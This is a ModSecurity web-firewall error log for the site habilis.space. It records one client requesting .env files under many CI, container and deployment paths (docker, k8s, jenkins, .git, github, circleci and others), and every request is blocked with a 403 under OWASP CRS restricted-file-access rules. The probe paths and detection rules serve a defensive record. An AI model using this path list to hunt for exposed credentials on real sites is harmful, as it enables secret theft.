[Mon May 11 17:33:54.513977 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/infrastructure/.env"] [unique_id "agH24vy_GXSWIKeli0sMagAAAI8"]
[Mon May 11 17:33:54.514198 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24vy_GXSWIKeli0sMagAAAI8"]
[Mon May 11 17:33:54.773542 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/docker/.env"] [unique_id "agH24vy_GXSWIKeli0sMbAAAAI8"]
[Mon May 11 17:33:54.773762 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/docker/.env"] [unique_id "agH24vy_GXSWIKeli0sMbAAAAI8"]
[Mon May 11 17:33:54.773988 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24vy_GXSWIKeli0sMbAAAAI8"]
[Mon May 11 17:33:54.934135 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/k8s/.env"] [unique_id "agH24vy_GXSWIKeli0sMbQAAAI8"]
[Mon May 11 17:33:54.934409 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/k8s/.env"] [unique_id "agH24vy_GXSWIKeli0sMbQAAAI8"]
[Mon May 11 17:33:54.934634 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24vy_GXSWIKeli0sMbQAAAI8"]
[Mon May 11 17:33:55.047014 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/kubernetes/.env"] [unique_id "agH24_y_GXSWIKeli0sMbgAAAI8"]
[Mon May 11 17:33:55.047325 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/kubernetes/.env"] [unique_id "agH24_y_GXSWIKeli0sMbgAAAI8"]
[Mon May 11 17:33:55.047580 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMbgAAAI8"]
[Mon May 11 17:33:55.159834 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/terraform/.env"] [unique_id "agH24_y_GXSWIKeli0sMbwAAAI8"]
[Mon May 11 17:33:55.160056 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/terraform/.env"] [unique_id "agH24_y_GXSWIKeli0sMbwAAAI8"]
[Mon May 11 17:33:55.160300 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMbwAAAI8"]
[Mon May 11 17:33:55.272603 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/ansible/.env"] [unique_id "agH24_y_GXSWIKeli0sMcAAAAI8"]
[Mon May 11 17:33:55.272863 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/ansible/.env"] [unique_id "agH24_y_GXSWIKeli0sMcAAAAI8"]
[Mon May 11 17:33:55.273094 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMcAAAAI8"]
[Mon May 11 17:33:55.384454 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/.env"] [unique_id "agH24_y_GXSWIKeli0sMcQAAAI8"]
[Mon May 11 17:33:55.384678 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/.env"] [unique_id "agH24_y_GXSWIKeli0sMcQAAAI8"]
[Mon May 11 17:33:55.384895 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMcQAAAI8"]
[Mon May 11 17:33:55.499599 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/ci/.env"] [unique_id "agH24_y_GXSWIKeli0sMcgAAAI8"]
[Mon May 11 17:33:55.499820 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/ci/.env"] [unique_id "agH24_y_GXSWIKeli0sMcgAAAI8"]
[Mon May 11 17:33:55.500056 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMcgAAAI8"]
[Mon May 11 17:33:55.614083 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cd/.env"] [unique_id "agH24_y_GXSWIKeli0sMcwAAAI8"]
[Mon May 11 17:33:55.614316 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cd/.env"] [unique_id "agH24_y_GXSWIKeli0sMcwAAAI8"]
[Mon May 11 17:33:55.614550 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMcwAAAI8"]
[Mon May 11 17:33:55.725876 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/jenkins/.env"] [unique_id "agH24_y_GXSWIKeli0sMdAAAAI8"]
[Mon May 11 17:33:55.726235 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/jenkins/.env"] [unique_id "agH24_y_GXSWIKeli0sMdAAAAI8"]
[Mon May 11 17:33:55.726570 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMdAAAAI8"]
[Mon May 11 17:33:55.840667 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/gitlab/.env"] [unique_id "agH24_y_GXSWIKeli0sMdQAAAI8"]
[Mon May 11 17:33:55.840979 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/gitlab/.env"] [unique_id "agH24_y_GXSWIKeli0sMdQAAAI8"]
[Mon May 11 17:33:55.841284 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMdQAAAI8"]
[Mon May 11 17:33:55.954738 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/github/.env"] [unique_id "agH24_y_GXSWIKeli0sMdgAAAI8"]
[Mon May 11 17:33:55.954964 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/github/.env"] [unique_id "agH24_y_GXSWIKeli0sMdgAAAI8"]
[Mon May 11 17:33:55.955195 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24_y_GXSWIKeli0sMdgAAAI8"]
[Mon May 11 17:33:56.068639 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/actions/.env"] [unique_id "agH25Py_GXSWIKeli0sMdwAAAI8"]
[Mon May 11 17:33:56.068960 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/actions/.env"] [unique_id "agH25Py_GXSWIKeli0sMdwAAAI8"]
[Mon May 11 17:33:56.069267 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMdwAAAI8"]
[Mon May 11 17:33:56.183130 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/circleci/.env"] [unique_id "agH25Py_GXSWIKeli0sMeAAAAI8"]
[Mon May 11 17:33:56.183367 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/circleci/.env"] [unique_id "agH25Py_GXSWIKeli0sMeAAAAI8"]
[Mon May 11 17:33:56.183588 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMeAAAAI8"]
